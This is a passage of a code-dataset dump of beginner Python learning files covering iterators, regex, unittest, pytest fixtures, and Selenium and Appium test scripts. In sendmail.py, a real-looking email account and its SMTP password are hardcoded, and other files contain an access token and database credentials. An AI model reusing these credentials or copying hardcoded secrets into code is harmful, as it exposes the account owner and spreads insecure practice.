'document.querySelector(\"#footerwrapper > div.bottombar > div > div.bot-left > div.qrcode-container.clearfix > div.img-container > img\").scrollIntoView()'\n\nwhile True:\n try:\n text = driver.find_element_by_css_selector('div.DiscoveryNews h2>span').text\n print(text)\n break\n except NoSuchElementException:\n #driver.find_element_by_xpath('//*[@id=\"footerwrapper\"]/div[1]/div/div[1]/div[2]/div[1]/img').location_once_scrolled_into_view()\n driver.execute_script(js2)\n time.sleep(2)\n\n\n\n" }, { "alpha_fraction": 0.5158265233039856, "alphanum_fraction": 0.5357561707496643, "avg_line_length": 16.77083396911621, "blob_id": "3cc35f32b1e1d185c768d4e0421873d1c3b291fc", "content_id": "0f21660aa4ea450d786275d277043fed8456fcc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 989, "license_type": "no_license", "max_line_length": 57, "num_lines": 48, "path": "/src/learn/day4_迭代器.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = iter(['alex', 'jack', 'lisa']) # 迭代器 使用next每次取一个数\nprint(name)\nprint(name.__next__())\nprint(name.__next__())\nprint(name.__next__())\n\n\n# 生成器\ndef cash_money(amount):\n while amount > 0:\n amount -= 100\n yield 100\n print('又来取钱了')\n\n\natm = cash_money(500) # 函数是生成器,返回迭代器,调用使用__next__\nprint(type(atm))\nprint(atm.__next__())\nprint(atm.__next__())\nprint('大保健')\nprint(atm.__next__())\nprint(atm.__next__())\n\n# 异步\nimport time\n\n\ndef consumer(name):\n print('%s is 准备吃包子' % name)\n while True:\n baozi = yield\n print('包子%s来了,被%s吃了' % (baozi, name))\n\n\ndef producer(name):\n c = consumer('A')\n c2 = consumer('B')\n c.__next__()\n c2.__next__()\n print('开始做包子')\n for i in range(10):\n # time.sleep(1)\n print('做了2个包子')\n c.send(i) # 将值发送给yield\n c2.send(i)\n\n\nproducer('alex')\n" }, { "alpha_fraction": 0.5851239562034607, "alphanum_fraction": 0.5917355418205261, "avg_line_length": 24.25, "blob_id": "9f6d19abeeead59b118cc80c75ac7993a8056c22", "content_id": "7e5e4ce1e24029dec0d8d8926307cecc1cfbaf07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 80, "num_lines": 24, "path": "/src/test/testng.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom test1 import result\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n def setUp(self):\n pass\n\n def test_get_result(self):\n params = {'page': 1}\n response = result('get', '/topics', params)\n self.assertEqual(True,response['success'])\n\n def test_post_result(self):\n params = {'accessToken': '47bac9bd-0c3f-4654-8aaa-171662bd3f45', 'title': 'test11', 'content': 'yyyyy'}\n response = result('post', '/topics', params)\n print(response)\n self.assertEqual('error', response)\n\n\n\n def tearDown(self):\n pass\nif __name__ == '__main__':\n NameTestCase" }, { "alpha_fraction": 0.6384615302085876, "alphanum_fraction": 0.6384615302085876, "avg_line_length": 31.75, "blob_id": "caac5a510085a7ae398194437e63d02bdeffe28c", "content_id": "704cc2e08936634e5e814842d61eb7d6b78d5239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/src/doc_1/test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "with open('../pi_digits.txt') as file_object:\n data = file_object.readline()\n contens =[i for i in data ]\n print(contens)" }, { 
"alpha_fraction": 0.556745171546936, "alphanum_fraction": 0.5695931315422058, "avg_line_length": 23.63157844543457, "blob_id": "3c8be0593c961ddbefcd778916e6e674d68446a9", "content_id": "f2920818182cf2677089a5bd0fe4edd02be45742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/src/pytest_v/common/singdriver.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\nclass Singdriver:\n\n __instance = None\n\n def __new__(cls, *args, **kwargs):\n '''new 创建对象时调用,单例模式统一管理浏览器实例'''\n if cls.__instance is None:\n cls.__instance = webdriver.Chrome()\n cls.__instance.implicitly_wait(10)\n cls.__instance.maximize_window()\n return cls.__instance\n\n# if __name__ == '__main__':\n# dir1 = Singdriver()\n# dir2 = Singdriver()\n# print(dir2)\n# print(dir2)" }, { "alpha_fraction": 0.39245930314064026, "alphanum_fraction": 0.4721508026123047, "avg_line_length": 21.882352828979492, "blob_id": "fe21da298071f19aeb8ff90c89eead6c3ea18ff2", "content_id": "d5154fb7beb72bcad91a26ffbcd500cdf52ac299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1279, "license_type": "no_license", "max_line_length": 54, "num_lines": 51, "path": "/src/learn/day_4数组旋转_正则.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''二维数组,将数组旋转'''\n\n'''\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n\n---------------------------\n[0, 0, 0, 0]\n[1, 1, 1, 1]\n[2, 2, 2, 2]\n[3, 3, 3, 3]\n'''\ndata = [[col for col in range(4)] for row in range(4)]\nprint(data)\nprint('-----------------------------')\nfor row in data:\n print(row)\n\nprint('--------------------------------')\n\nfor r_index, row in enumerate(data):\n # print(row)\n for c_index in range(r_index, len(row)):\n tem = data[c_index][r_index]\n data[c_index][r_index] = row[c_index]\n data[r_index][c_index] = tem\n\nfor i in data:\n print(i)\n\n'''正则'''\nimport re\n\nm = ('abc', 'abcf')\nm = re.match('[0-9][0-9]', '75abcf')\nm = re.match('[0-9]{0,10}', '75abcf') # 0-10次\nm = re.match('[0-9]{10}', '75abcf') # 10次\nm = re.findall('[0-9]{1,10}', '75ab9cf') # 自己直接返回匹配的值\nm = re.findall('[a-zA-Z]{1,10}', '75ab9cf') # 匹配所有字母\nm = re.findall('.*', '75ab9cf') # 匹配所有\nm = re.findall('.+', '75ab9cf') # 匹配一个不包含0\nm = re.findall('[a-zA-Z]+', '75a.b_9cf') # 匹配字母\nm = re.findall('~', '75a. b_9cf')\nm = re.search('\\d+$', 'ss75a. b_9cf') #整个查找 全部数字\n#m= re.sub('^\\d+','|','ss75a. 
b_9c1f',count=2) #替换两个\n\nif m:\n print(m)\n #m.\n" }, { "alpha_fraction": 0.5744680762290955, "alphanum_fraction": 0.5957446694374084, "avg_line_length": 17, "blob_id": "d658fa6761bf158c466ac2b4c5d10d806e3abbfd", "content_id": "03cffb96e0e2b9fc059f8c459c640ae0d5d548e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/src/beautiful_report/testcase/test_data.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom ddt import ddt,data,file_data,unpack\n\n\n@ddt\nclass myddt(unittest.TestCase):\n '''测试ddt'''\n @data([2,3],[4,5])\n def test_a(self,value):\n print(value[1])\n\nif __name__=='__main__':\n unittest.main()\n\n" }, { "alpha_fraction": 0.6521739363670349, "alphanum_fraction": 0.6555184125900269, "avg_line_length": 24, "blob_id": "e054231dd966df54f6058b9117026d8a37fca56c", "content_id": "6874311acae2488664553d022a1c9093003f14e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/src/beautiful_report/testcase/test13.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport unittest\n\ndriver = webdriver.Chrome()\nclass NameTestCase(unittest.TestCase): # 测试用例\n def test1(self):\n driver.get('https://www.baidu.com/')\n assert driver.current_url == 'https://www.baidu.com/'\n\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.5328466892242432, "alphanum_fraction": 0.5328466892242432, "avg_line_length": 18.571428298950195, "blob_id": "b89867e43c6e08aeacf1acf4044797c53e459574", "content_id": "0b0714a3c110d89a94666c5b333539b5e348d30c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/src/0728_sundry/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = input(\"name: \")\nage = input(\"age: \")\njob = input(\"job: \")\n\nprint('Name:' + name + '\\nage' + age + '\\njob' + job)\nprint('Name:%s\\nAge:%s\\nJob:%s' % (name, age, job)) # 只占用一次内存,中文: %s %()\n\nmessage = '''\nname:%s\nage:%s\njob:%s\n''' % (name, age, job)\n#段落\nprint(message)\n" }, { "alpha_fraction": 0.6080626845359802, "alphanum_fraction": 0.6416573524475098, "avg_line_length": 29.79310417175293, "blob_id": "1859bdfe6de851480adb6a16e33c009006967d42", "content_id": "55f344ee650456ed1275140e6f85a5ea002ca9ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 81, "num_lines": 29, "path": "/src/pytest_v/bussiness/user.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium.webdriver import ActionChains\n\nfrom singdriver import Singdriver\n\nclass UserAction:\n\n '''\n 业务相关操作\n '''\n\n def __init__(self):\n self.driver = Singdriver()\n\n def user_login(self):\n self.driver.get('http://39.107.96.138:3000/signin')\n self.driver.find_element_by_css_selector('#name').send_keys(\"testuser1\")\n self.driver.find_element_by_css_selector('#pass').send_keys('123456')\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n def user_send(self):\n self.user_login()\n 
self.driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = self.driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(self.driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()\n" }, { "alpha_fraction": 0.5025510191917419, "alphanum_fraction": 0.5229591727256775, "avg_line_length": 22.117647171020508, "blob_id": "c6b27b0a9a383811116c4ed0c5f2c7401878eba3", "content_id": "456de26cf3b52c4809ee766a9ae4c83c153892a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/src/Unit2/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "fo = open('Employee.txt', 'r', encoding=\"utf-8\")\nlines = fo.readlines()\nfo.close()\niempdata = list()\nfor line in lines[1:]:\n line = line.split()\n info_emp = {\n 'emp_id': line[0],\n 'emp_name': line[1],\n 'emp_birth': line[2],\n 'emp_edu': line[3],\n 'emp_sex': line[4],\n 'emp_kpi': int(line[5])\n }\n iempdata.append(info_emp)\n\nprint( iempdata)" }, { "alpha_fraction": 0.5109127163887024, "alphanum_fraction": 0.5932539701461792, "avg_line_length": 22.44186019897461, "blob_id": "9fdf5d72291de23e205ccb55a8e939f35518c819", "content_id": "9b709331e679ba7f5dce67f5a5fe84aae8ee375d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/src/learn/day3_3内置函数.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "print(abs(-99.9)) # 绝对值\nprint(all([1, 2, 3, ''])) # 所有必须不为空,才真\nprint(any([1, 2, 3, '', None])) # 有一个真则为真\nprint(ascii(8)) # 自动执行__repr__方法\nprint(bin(10)) # 转换二进制\nprint(bool(None)) # 布尔 返回false\nprint(bytearray('五五', encoding='utf-8')) # 转成字节数组\nprint(bytes('五五', encoding='utf-8')) # 转成字符串\nprint(callable(lambda x: x + 1)) # 是否可以执行\nprint(chr(99)) # 将数字码转换成字符\nprint(ord('c')) # 将字符转换成数字 :验证码\nprint(divmod(5, 2)) # 商和余数\nfor i in enumerate(['alex', 'eric'], 3):\n print(i) # 加上序列\nprint(eval('6*8')) # 字符串两个数相乘6*8\nli = [11, 22, 33, 44]\nprint(list(map(lambda x: x + 100, li))) # map循环调用lambda x: x + 100或者调用方法\n\n\ndef func(x):\n if x > 33:\n return True\n else:\n return False\n\n\nprint(list(filter(func, li))) # 根据True条件返回值,过滤\n''''\nformat()# 类似形参,传参数\nfloat()#浮点\nfrozenset()#不能修改的set\nhex(100) #16进制\noct()#8进制\nrange(0,10) #区间\nround(9.8) #四舍五入\nmax(11,22,33) # 最大\nmin(11,22,33) #最小\nsum(11,22)#求和\nsuper #子类用父类\n'''''\nx = [11, 22, 33, 44]\ny = [22, 33, 44, 55]\nprint(list(zip(x, y))) # xy相拼\n" }, { "alpha_fraction": 0.5934426188468933, "alphanum_fraction": 0.5967212915420532, "avg_line_length": 19.399999618530273, "blob_id": "f3904dbd7535227df622630e8e905fd602ce5395", "content_id": "56a851cb5560d0ef3028c5bd7db0b73975ab8681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 57, "num_lines": 15, "path": "/src/beautiful_report/page/topic_page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from page import Page\nfrom selenium.webdriver.common.by import By\n\n\nclass topic_page(Page):\n '''\n 发帖页面\n '''\n\n url = '/api/v1/topics'\n\n # 定位器\n # username = (By.CSS_SELECTOR, '#name')\n # password = (By.CSS_SELECTOR, '#pass')\n # submit_loc = (By.CSS_SELECTOR, 'input[value=\"登录\"]')" }, { 
"alpha_fraction": 0.5911329984664917, "alphanum_fraction": 0.6059113144874573, "avg_line_length": 19.399999618530273, "blob_id": "9e22cb167a37b8f1f87018271d6cdf1ed0400d08", "content_id": "0bf99b5ac20003ea5a8ee3f107e40145b1d83cea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/src/beautiful_report/testcase/test12.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n \"\"\"测试name_function\"\"\"\n\n\n def test_first_last_name1(self):\n \"\"\"能否正确处理janis Joplin\"\"\"\n self.assertEqual('22', 'Janis Joplin') # 断言" }, { "alpha_fraction": 0.5426356792449951, "alphanum_fraction": 0.5674418807029724, "avg_line_length": 22.035715103149414, "blob_id": "c76056646f3d6815288a575951685add1a3ab9c3", "content_id": "9327597a5ad3f2c39d5e166d21b9697ca61a57b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/src/beautiful_report/page/page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\nclass Page:\n '''\n 基础页面类\n '''\n\n login_url = 'http://39.107.96.138:3000'\n\n def __init__(self, seleium_driver, base_url=login_url):\n self.driver = seleium_driver\n self.base_url = base_url\n # 设置超时时间30秒\n self.timeout = 30\n\n def on_page(self):\n return self.driver.current_url == (self.base_url + self.url)\n\n def _open(self, url):\n url = self.base_url + url\n self.driver.get(url)\n assert self.on_page(), 'Did not land on %s' % url\n\n def open(self):\n self._open(self.url)\n\n def get_url(self):\n return self.base_url + self.url\n" }, { "alpha_fraction": 0.4745417535305023, "alphanum_fraction": 0.5173116326332092, "avg_line_length": 40, "blob_id": "9e732b16ceb536e66c937ee3036e25add0e02e1c", "content_id": "e40d76274cbae6aaa6c7273ac9dbb109b06d6a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 563, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/src/learn/sql.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pymysql\n\nconnect = pymysql.Connect(host=\"192.168.0.105\", #host=\"localhost\" \"127.0.0.1\"\n port=3306, #端口号\n user=\"root\", #用户名\n passwd=\"root\", #密码\n db=\"test\", #数据库\n charset='utf8')\ncursor = connect.cursor() #定义一个游标,用来执行sql语句\ncursor.execute(\"select * from test\")\nresult = cursor.fetchall() ## fetchone 获取一条 fetchmany 获取多条 fetchall 获取所有\nprint(result)" }, { "alpha_fraction": 0.4730878174304962, "alphanum_fraction": 0.5155807137489319, "avg_line_length": 19.764705657958984, "blob_id": "60389e31d461c09313ae4a1b1997ca90b90d9361", "content_id": "73b4069297b015adccb83618fce18c7c5c66bc13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/src/pytest_v/testcase/test_param.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pytest\n\ndata = [('1', '2', '3'), ('2', '2', '3'), ('3', '2', '3')]\n\n\[email protected](params=data, ids=['tab1', 'tab2', 'tab3'])\ndef func(request):\n '''\n 数据传参的时候 主要是作为 不同数据的不同解释\n :param request: params作为数据驱动\n :return:\n '''\n return request.param\n\n\ndef 
test_01(func):\n print(f'=========={func}====={type(func)}====={func[0]}')\n" }, { "alpha_fraction": 0.5785440802574158, "alphanum_fraction": 0.5785440802574158, "avg_line_length": 14.352941513061523, "blob_id": "334ccfff94b7c722777b9c0e218541526e5ef2cd", "content_id": "ea5b408fe2cfb021ce6b420b8930db903b4cf3f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/src/beautiful_report/business/login.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from login_page import LoginPage\nfrom singdriver import Singdriver\n\n\nclass user:\n '''\n 注册登陆\n '''\n\n def login(self):\n loginpage = LoginPage(Singdriver())\n loginpage.open()\n\n\nif __name__ == '__main__':\n user = user()\n user.login()\n" }, { "alpha_fraction": 0.538922131061554, "alphanum_fraction": 0.5638722777366638, "avg_line_length": 25.36842155456543, "blob_id": "fb111d61ac783ca0491e9ffe30306975ddb1ae53", "content_id": "588c7790f3ae9780d6b524f907c13506c65ef431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1110, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/src/learn/sendmail.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import email.mime.text\nimport email.utils\n\n\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\nself_user = '[email protected]'\ndef mail(self_user):\n ret = True\n try:\n\n sender = '[email protected]' # 发件人邮箱(最好写全, 不然会失败)\n receivers = ['[email protected]'] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱\n\n msg = MIMEText('邮件内容', 'plain', 'utf-8')\n msg['From'] = \"{}\".format(sender)\n msg['To'] = \",\".join(receivers)\n msg['Subject'] = '主题'\n\n # server = smtplib.SMTP_SSL('applesmtp.163.com', 465)\n # server.connect('applesmtp.163.com', 25)\n # server.login('[email protected]', 'Qzxcvb50')\n # server.sendmail(msg['From'],msg['To'] , msg.as_string())\n\n server = smtplib.SMTP_SSL('applesmtp.163.com', 465) # 启用SSL发信, 端口一般是465\n server.login('[email protected]', 'Qzxcvb50') # 登录验证\n server.sendmail('[email protected]', [self_user], msg.as_string()) # 发送\n\n server.quit()\n except Exception:\n ret = False\n return ret\n\n\nif __name__ == '__main__':\n print(mail('[email protected]'))\n" }, { "alpha_fraction": 0.6248455047607422, "alphanum_fraction": 0.6266996264457703, "avg_line_length": 30.115385055541992, "blob_id": "26bd62813b4b10a4fd79ff98f05340f5b1bf62bb", "content_id": "6c3c064987d06ed7ab5d07db112031c575ef77c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1740, "license_type": "no_license", "max_line_length": 76, "num_lines": 52, "path": "/src/testcase/test_name_function.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom testcase.name_function import get_formatted_name, AnoymoisSurey\n\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n \"\"\"测试name_function\"\"\"\n\n def test_first_last_name1(self):\n \"\"\"能否正确处理janis Joplin\"\"\"\n formatted_name = get_formatted_name('janis', 'Joplin')\n self.assertEqual(formatted_name, 'Janis Joplin') # 断言\n\n def test_first_last_middle_name(self):\n \"\"\"能否正确处理像Wolfgang Amadeus Mozart\"\"\"\n formatted_name = get_formatted_name('Wolfgang', 'Mozart', 'Amadeus')\n self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')\n\n\nclass AnoymoisSureyTestCase(unittest.TestCase):\n 
\"\"\"针对AnoymoisSurey测试\"\"\"\n\n def test_response(self):\n \"\"\"测试答案是否存储\"\"\"\n question = \"What are you learn?\"\n my_survey = AnoymoisSurey(question)\n responses = ['English', 'Chinese'] # 存储多个答案\n for response in responses:\n my_survey.store_response(response)\n for response in responses:\n self.assertIn(response, my_survey.responses)\n\n def setUp(self):\n question = \"What are you learn?\"\n self.my_survey = AnoymoisSurey(question)\n self.responses = ['English', 'Chinese'] # 存储多个答案\n\n def test_store_sigle(self):\n \"\"\"测试单个答案\"\"\"\n self.my_survey.store_response(self.responses[0])\n self.assertIn(self.responses[0], self.my_survey.responses)\n\n def test_two_sigle(self):\n \"\"\"测试三个是否正常存储\"\"\"\n\n for response in self.responses:\n self.my_survey.store_response(response)\n for response in self.responses:\n self.assertIn(response, self.my_survey.responses)\n\n\nunittest.main()\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5526315569877625, "avg_line_length": 13.538461685180664, "blob_id": "dadcc57e36a8cc189899c99d4d84e052c26c1a2c", "content_id": "698ca3b09f3290b684d0dad9fe3b1540b89d0d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 31, "num_lines": 13, "path": "/src/beautiful_report/API_test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import ddt\nimport unittest\n\[email protected]\nclass test1(unittest.TestCase):\n datali=[\n {1,2},\n {2,3}\n ]\n\n @ddt.data(*datali)\n def testa(self,value):\n print(value)\n\n" }, { "alpha_fraction": 0.4662731885910034, "alphanum_fraction": 0.47892072796821594, "avg_line_length": 27.926828384399414, "blob_id": "a6754c4981c7ef8911a5b4c2a201fc289c79eb06", "content_id": "c529b7f775f5b65557a3ce3497241c6dbf9eabe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 71, "num_lines": 41, "path": "/src/Unit2/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Employee():\n def __init__(self, emp_id, emp_name, emp_edu='本科'):\n self.emp_id = emp_id\n self.emp_name = emp_name\n self.emp_edu = emp_edu\n\n file = 'Employee.txt'\n iempdata = list()\n def readfile(self):\n fo = open(self.file, 'r', encoding=\"utf-8\")\n lines = fo.readlines()\n fo.close()\n if len(lines) < 2:\n return []\n for line in lines[1:]:\n line = line.split('\\t')\n info_emp = {\n 'emp_id': line[0],\n 'emp_name': line[1],\n 'emp_birth': line[2],\n 'emp_edu': line[3],\n 'emp_sex': line[4],\n 'emp_kpi': int(line[5])\n }\n self.iempdata.append(info_emp)\n return self.iempdata\n def _getNewId(self):\n \"\"\"获取最大员工id+1\"\"\"\n if len(self.iempdata) != 0:\n dempDataRow = max(self.iempdata, key=lambda x: x['emp_id'])\n print(dempDataRow)\n iNewid = int(dempDataRow['emp_id'])+1\n else:\n iNewid =1\n return iNewid\n\n\n\nmy_employee = Employee('eu','23')\nprint(my_employee.readfile())\nprint(my_employee._getNewId())\n" }, { "alpha_fraction": 0.6495237946510315, "alphanum_fraction": 0.6828571557998657, "avg_line_length": 42.70833206176758, "blob_id": "7b4cc6245b79c44228b856c853d6d22b1fa94cf1", "content_id": "6ce5a899697934b4b6db108687019643612d60d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/src/appium_test/test1.py", 
"repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from appium import webdriver\nimport time\n\ndesired_caps = {}\ndesired_caps['platformName'] = 'Android' #平台名称\ndesired_caps['deviceName'] = '192.168.0.105:5555' #建立连接\n#desired_caps['deviceName'] = 'Coolpad 5263S' #机器名\n#desired_caps['udid'] = '2b435cfe' #真机\n\n\n# desired_caps['app'] = r'D:\\kaoyan3.1.0.apk'\n# desired_caps['appPackage'] = 'com.tal.kaoyan'\n# desired_caps['appActivity'] = 'com.tal.kaoyan.ui.activity.SplashActivity'\n#\n# driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\n#\n# driver.implicitly_wait('10')\n# driver.find_element_by_id('android:id/button2').click()\n# driver.find_element_by_id('com.tal.kaoyan:id/tv_skip').click()\n# driver.find_element_by_id('com.tal.kaoyan:id/login_email_edittext').send_keys('122112112')\n# driver.find_element_by_id('com.tal.kaoyan:id/login_password_edittext').send_keys('111111111')\n# time.sleep(10)\n# driver.find_element_by_id('com.tal.kaoyan:id/login_scan_btn').click()\ndriver.find_element_by_id('com.ss.android.ugc.aweme:id/a_8').click()\n\n" }, { "alpha_fraction": 0.4872824549674988, "alphanum_fraction": 0.5006693601608276, "avg_line_length": 12.600000381469727, "blob_id": "c50e42e7b94cde372c4716799ebfcbb0af3a38fc", "content_id": "9f25a60df13336dd368628423fbb61311656e579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 883, "license_type": "no_license", "max_line_length": 38, "num_lines": 55, "path": "/src/pytest_v/testcase/temp.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pytest\n'''\n函数级别进行测试用例先后执行\n'''\[email protected]()\ndef func(func2,func3):\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown')\n\[email protected](scope='module')\ndef func2():\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up moudle---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown')\n\[email protected](scope='class')\ndef func3():\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up class---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown class')\n\n\n\n\ndef test_01():\n print('tttt')\n\ndef test02():\n print('ssss')\n\nclass TestTemp2:\n def test1(self,func):\n print('----------------')" }, { "alpha_fraction": 0.6020408272743225, "alphanum_fraction": 0.6020408272743225, "avg_line_length": 18.600000381469727, "blob_id": "bda8684db49ee6100a9ccb36cc10f6f38de7b154", "content_id": "8591cbb43b7cf069772522cd8c82805e05509c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 55, "num_lines": 15, "path": "/src/beautiful_report/page/login_page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from page import Page\nfrom selenium.webdriver.common.by import By\n\n\nclass LoginPage(Page):\n '''\n 登陆页面\n '''\n\n url = '/signin'\n\n # 定位器\n username = (By.CSS_SELECTOR, '#name')\n password = (By.CSS_SELECTOR, '#pass')\n submit_loc = (By.CSS_SELECTOR, 'input[value=\"登录\"]')\n" }, { "alpha_fraction": 0.47287341952323914, "alphanum_fraction": 0.48425987362861633, "avg_line_length": 23.04838752746582, "blob_id": "efe798f3b868ee3037258dea4d885bdfdc3e5b84", "content_id": "15199150f3a032770e03e4636765d9c9665cbe91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 59, 
"num_lines": 62, "path": "/src/work/day1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\"作业:编写登陆接口\"\"\"\n\n\"\"\"输入用户名密码\n认证成功后显示欢迎信息\n输错三次后锁定\"\"\"\n\n\"\"\"3级菜单\"\"\"\n\n\n# # 1、用户信息文件 2、黑名单文件\n# class main():\n# with open('blackname.txt') as file_object:\n# blackname = file_object.read()\n# print(blackname)\n# with open('whitename.txt') as file_object1:\n# whitenam = file_object1.read()\n# print(whitenam)\n\n\ndef main():\n count = 0\n while count < 3:\n name = input(\"用户名: \")\n with open('blackname.txt', 'r') as file_object:\n lines = file_object.readlines()\n blackname2(lines, name)\n if len(name) == 0:\n print('密码不能为空')\n continue\n\n password = input('密码: ')\n with open('whitename.txt', 'r') as file_object:\n flag = False\n for line in file_object.readlines():\n user, password1 = line.strip().split()\n if name == user and password == password1:\n print('success!')\n flag = True\n break\n if flag == False:\n if count < 2:\n print('用户名或密码错误')\n count += 1\n else:\n print('成功')\n\n\ndef blackname1(lines, name):\n for line in lines:\n if name == line.strip():\n print('用户 %s 已经被锁定' % name)\n\n\ndef blackname2(lines, name):\n line1 = []\n for line in lines:\n line1.append(line)\n if name in line1:\n print('用户 %s 已经被锁定,退出' % name)\n\nif __name__ == '__main__':\n main()\n\n\n" }, { "alpha_fraction": 0.6801228523254395, "alphanum_fraction": 0.7073277831077576, "avg_line_length": 27.13580322265625, "blob_id": "541985b3e2bbfdeb1ca81ec4bdf69a726ba10193", "content_id": "4475cdd74355ad44de36166af1084435c090960d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2469, "license_type": "no_license", "max_line_length": 98, "num_lines": 81, "path": "/src/test/test/work_login.py", 